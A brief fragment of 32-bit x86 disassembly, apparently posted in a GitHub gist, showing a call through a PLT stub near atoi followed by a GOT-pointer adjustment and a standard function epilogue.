| 8048da8: e8 f3 f7 ff ff call 80485a0 <atoi@plt+0x40> | |
| 8048dad: 81 c3 53 22 00 00 add $0x2253,%ebx | |
| 8048db3: 83 c4 08 add $0x8,%esp | |
| 8048db6: 5b pop %ebx | |
| 8048db7: c3 ret |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment